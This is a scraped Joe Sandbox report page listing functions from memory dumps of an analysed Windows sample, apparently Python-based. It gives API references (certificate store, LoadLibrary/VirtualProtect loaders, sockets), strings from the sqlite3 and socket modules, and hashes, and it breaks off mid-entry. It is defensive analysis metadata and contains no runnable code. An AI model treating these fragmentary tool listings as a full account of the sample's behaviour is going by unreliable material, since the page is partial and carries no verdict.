Associated: 00000001.00000002.2483357030.00007FF8A8BEA000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2483357030.00007FF8A8CA6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2483357030.00007FF8A8CCB000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2483357030.00007FF8A8D65000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2483357030.00007FF8A8D68000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2483357030.00007FF8A8E70000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2483357030.00007FF8A8EB1000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2483357030.00007FF8A8EBB000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2483357030.00007FF8A8F1D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2484391036.00007FF8A8F2B000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a8950000_Resource.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID: 2v]
API String ID: 3300690313-3021020117
Opcode ID: 9bddde282dbbdb65e7b91acdafd26197c66bfe7ae65582efb0e6c09338b35502
Instruction ID: 2ca1ca1a4e0a0596bc6fcbe149f7e3b62edfded968e6f26d01e95649c6b0a685
Opcode Fuzzy Hash: 9bddde282dbbdb65e7b91acdafd26197c66bfe7ae65582efb0e6c09338b35502
Instruction Fuzzy Hash: 3362133262919296E7198F38E5002BD77A0FB487C5F149532EA9EC3784FB3CEA45CB14

Function 00007FF8B7E1A0E8 Relevance: 7.7, APIs: 5, Instructions: 173encryptionCOMMON

Download Yara Rule

APIs

00007FF8A8ABF9AC.PYTHON311 ref: 00007FF8B7E1A10A

Part of subcall function 00007FF8B7E1C0E0: CertOpenStore.CRYPT32 ref: 00007FF8B7E1C10C

GetLastError.KERNEL32 ref: 00007FF8B7E1A13B
CertEnumCertificatesInStore.CRYPT32 ref: 00007FF8B7E1A210
CertFreeCertificateContext.CRYPT32 ref: 00007FF8B7E1A291

Part of subcall function 00007FF8B7E1B9D8: CertGetEnhancedKeyUsage.CRYPT32 ref: 00007FF8B7E1B9F7
Part of subcall function 00007FF8B7E1B9D8: GetLastError.KERNEL32 ref: 00007FF8B7E1BA01

CertCloseStore.CRYPT32 ref: 00007FF8B7E1A2F0

Memory Dump Source

Source File: 00000001.00000002.2485371418.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B7E10000, based on PE: true

Associated: 00000001.00000002.2485330634.00007FF8B7E10000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E30000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E39000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E3D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485534943.00007FF8B7E40000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485575820.00007FF8B7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e10000_Resource.jbxd

Similarity

API ID: Cert$Store$ErrorLast$00007CertificateCertificatesCloseContextEnhancedEnumFreeOpenUsage
String ID:
API String ID: 1905439668-0
Opcode ID: 026a14245fef453ce3d65f29d84bb8553a0a4b30dbea44e5e557f8660a976952
Instruction ID: a1f05d7d8b9e65cade3cab5324005c78ecb5ebeedac348cb7c36361b806e5436
Opcode Fuzzy Hash: 026a14245fef453ce3d65f29d84bb8553a0a4b30dbea44e5e557f8660a976952
Instruction Fuzzy Hash: C961F961E0DB1281FAD9DFB9995613E63A1AF55FE0F094474CB0E16FA0EE3EA845D300

Function 00007FF8A87E8290 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 522COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87E83DE

Strings

immutable, xrefs: 00007FF8A87E87ED
nolock, xrefs: 00007FF8A87E87B6
-journal, xrefs: 00007FF8A87E8637

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: -journal$immutable$nolock
API String ID: 3568877910-4201244970
Opcode ID: db567f1d966d48c1a6eb9b22193708d6558ba034de356d8c5b90380909e4eb80
Instruction ID: f6c2bf71466809509cdeb863bad096df11169b71072418f851744cacf74d1921
Opcode Fuzzy Hash: db567f1d966d48c1a6eb9b22193708d6558ba034de356d8c5b90380909e4eb80
Instruction Fuzzy Hash: 5432BD22A0A782A6EB648F25944437977A1FF45BE8F484235CE5E477D4EF3CE464C328

Function 00007FF8A8851850 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 369COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A88518BF

Strings

statement too long, xrefs: 00007FF8A8851A76
out of memory, xrefs: 00007FF8A885192B
database schema is locked: %s, xrefs: 00007FF8A8851A16

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: database schema is locked: %s$out of memory$statement too long
API String ID: 3568877910-1046679716
Opcode ID: 0d300a8cd5454f87c66fd638e27987bfbefb878a4d46b03e8c9914967d7855c6
Instruction ID: c813cdbc3d62d56f0809b8d9cf917e055398013256b7e6c1cb504e71c74bc002
Opcode Fuzzy Hash: 0d300a8cd5454f87c66fd638e27987bfbefb878a4d46b03e8c9914967d7855c6
Instruction Fuzzy Hash: CCF1C726B0E782A6FB29CF2194503BA67A0FB85BC8F441175DA8E07795DF7CE840C718

Function 00007FF8B7E66DC0 Relevance: 6.9, APIs: 4, Instructions: 889librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF8B7E678D5
GetProcAddress.KERNEL32 ref: 00007FF8B7E678FF
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FF8B7E6797F
VirtualProtect.KERNEL32 ref: 00007FF8B7E6799D

Memory Dump Source

Source File: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: 967db69ea97db98777b7c1819c1f1553088aaf51e529f8141078863ed4501264
Instruction ID: 39c92f27295754e5a5cc0a63f2ecee9ad8b06db5af43f7cef91f166f2636f7c3
Opcode Fuzzy Hash: 967db69ea97db98777b7c1819c1f1553088aaf51e529f8141078863ed4501264
Instruction Fuzzy Hash: 4762276262829286E7158E3CD4002BD7791FB58BC6F045532EB9ED77D8EA3CFA45C700

Function 00007FF8B7E02110 Relevance: 6.9, APIs: 4, Instructions: 885librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF8B7E02C25
GetProcAddress.KERNEL32 ref: 00007FF8B7E02C43
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FF8B7E02CC3
VirtualProtect.KERNEL32 ref: 00007FF8B7E02CE1

Memory Dump Source

Source File: 00000001.00000002.2485250154.00007FF8B7E02000.00000080.00000001.01000000.00000011.sdmp, Offset: 00007FF8B7DF0000, based on PE: true

Associated: 00000001.00000002.2485076175.00007FF8B7DF0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485119166.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485119166.00007FF8B7DFE000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485119166.00007FF8B7E01000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2485286720.00007FF8B7E03000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7df0000_Resource.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: 0830e18f13b383c0d94ef01180bde7bd9eef2b0f7716c651d804f7d705106dd4
Instruction ID: 93846c151dad19a57e1f4650704f193d2dced857be197b70b9deebb8aec23bc2
Opcode Fuzzy Hash: 0830e18f13b383c0d94ef01180bde7bd9eef2b0f7716c651d804f7d705106dd4
Instruction Fuzzy Hash: 7062162262869286E7168E3CD4452BD77D4FB58BC5F045532EB9EC37A4EA3CEA45CB00

Function 00007FF8A8797B30 Relevance: 6.8, APIs: 4, Instructions: 850librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF8A87985F0
GetProcAddress.KERNEL32 ref: 00007FF8A879861A
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FF8A87986A4
VirtualProtect.KERNEL32 ref: 00007FF8A87986C2

Memory Dump Source

Source File: 00000001.00000002.2482755530.00007FF8A8797000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FF8A82A0000, based on PE: true

Associated: 00000001.00000002.2481123085.00007FF8A82A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A82A1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A82B2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A82C2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A82C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A8312000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A8327000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A8337000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A833E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A834C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A8609000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A860B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A8642000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A8682000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A86DA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A874A000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A877F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2481190225.00007FF8A8791000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2482832538.00007FF8A8799000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a82a0000_Resource.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
Instruction ID: f8f8bb7b0663e77afb1b4d0256db863b1239f3290594641628df01dca47f7013
Opcode Fuzzy Hash: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
Instruction Fuzzy Hash: CC62332262999296E799CF38D40027D77A0FB487C5F045532EAAEC37C4EB3CEA54CB14

Function 00007FF8B7E545E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48networkCOMMON

Download Yara Rule

APIs

bind.WS2_32 ref: 00007FF8B7E54669

Strings

socket.bind, xrefs: 00007FF8B7E54639
bind, xrefs: 00007FF8B7E54607

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: bind
String ID: bind$socket.bind
API String ID: 1187836755-187351271
Opcode ID: dc24cef773245b4122254bbfd203ff68aadfac931a17838e96712d49baaaed77
Instruction ID: 8f29e6f144932146a8a6baaa7c88cd598d0e4e2cc50b6e8a100bdf4fd7aca624
Opcode Fuzzy Hash: dc24cef773245b4122254bbfd203ff68aadfac931a17838e96712d49baaaed77
Instruction Fuzzy Hash: B011E2A5A08BCA82E7209B59E8417AE6364FF89FC4F040532DB8D57A64DF7CF549C710

Function 00007FF8A87F0A50 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 590COMMON

Download Yara Rule

APIs

00007FF8C6125630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A87F0AB8

Strings

:memory:, xrefs: 00007FF8A87F0AAE

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007C6125630
String ID: :memory:
API String ID: 1529501491-2920599690
Opcode ID: 850099d980877facda77a0513fb5da35c40c272eade80bd78b5070cbea877dfb
Instruction ID: c8e7ef1b82ee1f5f6f0db32d4b796acc115b1cf8b4e07497ef4f491957e51323
Opcode Fuzzy Hash: 850099d980877facda77a0513fb5da35c40c272eade80bd78b5070cbea877dfb
Instruction Fuzzy Hash: 2E42E022E4E78AA2EB658F26945437967A0FF45BC5F084135DA4D43790EFBCEC90C728

Function 00007FF8A87E0180 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FF8A87E01A5

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
Instruction ID: dd62f9c4025aaa57ffbdadb66c2c4c0f622a6d7c27d0812be3e20ae033f2e746
Opcode Fuzzy Hash: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
Instruction Fuzzy Hash: 08A1F664E4BB07A6FF688B55A85833862E4FF55BC5F580539C90E077A0FF7CA4918328

Function 00007FF8B7E557E4 Relevance: 1.5, APIs: 1, Instructions: 21networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FF8B7E55814

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 05f4ad654d63955a228a8d88d4a6ecf7af8c89285e2e0ece8e9722be10d1f702
Instruction ID: bf67adbe8486f601b2f91f72ff457bdd55486f271dbcb59e47d7e0e8af656f43
Opcode Fuzzy Hash: 05f4ad654d63955a228a8d88d4a6ecf7af8c89285e2e0ece8e9722be10d1f702
Instruction Fuzzy Hash: 90E012B1B0074582DB189B1AD4512386391FB08FA4F245735DE3D8B3E0DE2CD8E1C340

Function 00007FF8B8AF5F30 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6078
00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6096
00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF60B4
00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF60D2

Strings

SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu., xrefs: 00007FF8B8AFCE08
Base Connection.__init__ not called., xrefs: 00007FF8B8AFCE3F
delete, xrefs: 00007FF8B8AF60AA
Cannot operate on a closed database., xrefs: 00007FF8B8AF6325
the query contains a null character, xrefs: 00007FF8B8AF624F
You can only execute one statement at a time., xrefs: 00007FF8B8AF61F1
update, xrefs: 00007FF8B8AF608C
insert, xrefs: 00007FF8B8AF606E
sqlite3.Connection, xrefs: 00007FF8B8AF6264
query string is too large, xrefs: 00007FF8B8AF62CB
replace, xrefs: 00007FF8B8AF60C8

Memory Dump Source

Source File: 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8AF0000, based on PE: true

Associated: 00000001.00000002.2485899265.00007FF8B8AF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2485937186.00007FF8B8B08000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2485937186.00007FF8B8B0E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2486071627.00007FF8B8B10000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b8af0000_Resource.jbxd

Similarity

API ID: 00007C6126
String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$You can only execute one statement at a time.$delete$insert$query string is too large$replace$sqlite3.Connection$the query contains a null character$update
API String ID: 1558781965-3639599724
Opcode ID: 2ca597ee9cf5982963c49dec3e510ab952d8cfe2c32dbb181abe08a7c94bb109
Instruction ID: 88758f3b7eb5b918cdd259084e6a58651f05a4f749c90d4455db43af7c645ae7
Opcode Fuzzy Hash: 2ca597ee9cf5982963c49dec3e510ab952d8cfe2c32dbb181abe08a7c94bb109
Instruction Fuzzy Hash: 57918321A0A64283FB608B29D8562792361EF44FC5F006535DB0ECB6A5DF3DE55BC30E

Function 00007FF8B8AF49E0 Relevance: 21.6, APIs: 3, Strings: 9, Instructions: 615COMMON

Download Yara Rule

APIs

00007FF8A89BC8C0.PYTHON311 ref: 00007FF8B8AF4A82
00007FF8A8806B10.SQLITE3 ref: 00007FF8B8AF4C2D
00007FF8A8806B10.SQLITE3 ref: 00007FF8B8AF4F8E

Part of subcall function 00007FF8B8AF6DD0: 00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6EB3
Part of subcall function 00007FF8B8AF6DD0: 00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6ECE
Part of subcall function 00007FF8B8AF6DD0: 00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6EE5
Part of subcall function 00007FF8B8AF6DD0: 00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6EFD

Strings

SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu., xrefs: 00007FF8B8AF5243
Base Connection.__init__ not called., xrefs: 00007FF8B8AFCA80
executemany() can only execute DML statements., xrefs: 00007FF8B8AF50A9
Cannot operate on a closed database., xrefs: 00007FF8B8AF5209
Base Cursor.__init__ not called., xrefs: 00007FF8B8AF5279
Error while building row_cast_map, xrefs: 00007FF8B8AFCBA2
Cannot operate on a closed cursor., xrefs: 00007FF8B8AF5223
Recursive use of cursors not allowed., xrefs: 00007FF8B8AF5296
BEGIN , xrefs: 00007FF8B8AF4F0E

Memory Dump Source

Source File: 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8AF0000, based on PE: true

Associated: 00000001.00000002.2485899265.00007FF8B8AF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2485937186.00007FF8B8B08000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2485937186.00007FF8B8B0E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2486071627.00007FF8B8B10000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b8af0000_Resource.jbxd

Similarity

API ID: 00007$C6126$A8806
String ID: BEGIN $Base Connection.__init__ not called.$Base Cursor.__init__ not called.$Cannot operate on a closed cursor.$Cannot operate on a closed database.$Error while building row_cast_map$Recursive use of cursors not allowed.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$executemany() can only execute DML statements.
API String ID: 4004158961-2731538448
Opcode ID: 46f0396fcc794f300f6c3a0d81339de67e9a2b72a0c27424ac2496e31833a1f5
Instruction ID: db83adedc431a547e2d6f30b1a6b40fa814deb0348be0cb17aded26ef78f0070
Opcode Fuzzy Hash: 46f0396fcc794f300f6c3a0d81339de67e9a2b72a0c27424ac2496e31833a1f5
Instruction Fuzzy Hash: 5C525921A0BB0287EB549F29D48627823A5FF45BC4F142435CB0E877A4EF3DE496C74A

Function 00007FF8B7E5500C Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 244
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketW.WS2_32 ref: 00007FF8B7E551FC
getsockname.WS2_32 ref: 00007FF8B7E552DC
WSAGetLastError.WS2_32 ref: 00007FF8B7E552FB
getsockopt.WS2_32 ref: 00007FF8B7E55337
WSASocketW.WS2_32 ref: 00007FF8B7E5539E
socket.WS2_32 ref: 00007FF8B7E553BA
SetHandleInformation.KERNEL32 ref: 00007FF8B7E553F0
closesocket.WS2_32 ref: 00007FF8B7E55409

Strings

negative file descriptor, xrefs: 00007FF8B7E552A0
socket.__new__, xrefs: 00007FF8B7E5506A, 00007FF8B7E551A0
Oiii, xrefs: 00007FF8B7E55059, 00007FF8B7E55160
socket descriptor string has wrong size, should be %zu bytes., xrefs: 00007FF8B7E550B9

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: Socket$ErrorHandleInformationLastclosesocketgetsocknamegetsockoptsocket
String ID: Oiii$negative file descriptor$socket descriptor string has wrong size, should be %zu bytes.$socket.__new__
API String ID: 3860486567-2881308447
Opcode ID: b1c3a3ea00c3125276caac0fd55494debdefbed152b8eac7d43fe530445a96d7
Instruction ID: 9417cd08d4fd2a54d1d42e9529be991126aec64be5a78ce345654b4d2dac1e2e
Opcode Fuzzy Hash: b1c3a3ea00c3125276caac0fd55494debdefbed152b8eac7d43fe530445a96d7
Instruction Fuzzy Hash: 7DC13AA2A08B8982E7608B2D994426D73A1FF95BE8F105335DB6D526B1EF3CF584C740

Function 00007FF8B7E56650 Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 242
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 00007FF8B7E56862
